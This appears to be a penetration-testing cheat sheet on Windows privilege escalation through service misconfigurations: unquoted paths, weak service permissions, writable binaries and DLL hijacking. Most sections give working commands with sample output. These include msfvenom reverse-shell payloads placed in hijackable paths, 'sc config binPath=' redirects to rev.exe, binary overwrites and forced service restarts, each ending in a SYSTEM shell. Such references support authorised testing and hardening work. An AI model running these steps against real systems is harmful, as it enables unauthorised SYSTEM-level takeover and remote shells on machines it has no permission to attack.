SERVICE MISCONFIGURATIONS

List all services

See all services — Look for non-default services

sc queryex type=service state=all
Get-Service
wmic service list brief
Example Output
sc queryex type=service state=all | findstr /i 'SERVICE_NAME\|DISPLAY_NAME\|STATE'
SERVICE_NAME: CustomSvc
DISPLAY_NAME: Custom Application
STATE: 4 RUNNING
(Find non-default services to investigate)

Unquoted service paths

Paths with spaces, no quotes — C:\Program Files\My App\svc.exe = hijack

wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows"
Example Output
wmic service get name,pathname | findstr /v "C:\Windows"
CustomSvc  C:\Program Files\My App\service.exe

Path has spaces + no quotes = hijackable
Place: C:\Program Files\My.exe
Restart service -> runs your exe as SYSTEM

Exploit unquoted path

Windows tries each space as path end — Restart service to trigger

If path: C:\Program Files\My App\service.exe
Place malicious exe at: C:\Program.exe
or: C:\Program Files\My.exe
Example Output
Path: C:\Program Files\My App\service.exe

msfvenom -p windows/x64/shell_reverse_tcp ... -f exe -o 'C:\Program Files\My.exe'

sc stop CustomSvc
sc start CustomSvc

Attacker:
C:\> whoami
nt authority\system

Weak service permissions

Can you modify service config? — Change binPath to your payload

accesschk.exe -uwcqv * /accepteula
or: sc qc <service_name>
Example Output
accesschk.exe -uwcqv 'Everyone' * /accepteula
RW CustomService
  SERVICE_ALL_ACCESS

sc config CustomService binPath= 'C:\temp\rev.exe'
sc stop CustomService
sc start CustomService
(Shell as SYSTEM)

Modify service binary path

Point service to your payload — Runs as service account (often SYSTEM)

sc config <service> binPath= 'C:\temp\rev.exe'
sc stop <service>
sc start <service>
Example Output
sc config CustomSvc binPath= 'C:\temp\rev.exe'
[SC] ChangeServiceConfig SUCCESS

sc stop CustomSvc
sc start CustomSvc

Attacker:
C:\> whoami
nt authority\system

Writable service binary

Replace the actual binary — Overwrite with reverse shell

icacls 'C:\path\to\service.exe'
Look for: (F) or (M) for your user
Example Output
icacls C:\custom\svc.exe
BUILTIN\Users:(F)  <- FULL CONTROL!

copy C:\temp\rev.exe C:\custom\svc.exe /Y
sc stop CustomSvc
sc start CustomSvc
(Your payload runs as SYSTEM)

DLL hijacking (services)

Service loads missing DLL — DLL runs as service user

Process Monitor: filter for NAME NOT FOUND on .dll
Place malicious DLL in search path
Example Output
Process Monitor filter: Result=NAME NOT FOUND, Path ends with .dll
CustomSvc.exe -> C:\custom\missing.dll NOT FOUND

msfvenom -p windows/x64/shell_reverse_tcp ... -f dll -o C:\custom\missing.dll
Restart service -> shell as SYSTEM

Service restart permissions

Need to trigger the service — Some need admin to restart

sc stop <service>
sc start <service>
or reboot if you can
Example Output
sc stop CustomSvc
[SC] Access denied

Try: shutdown /r /t 0
OR wait for scheduled restart
OR: sc config CustomSvc start=auto
(Service restarts after reboot)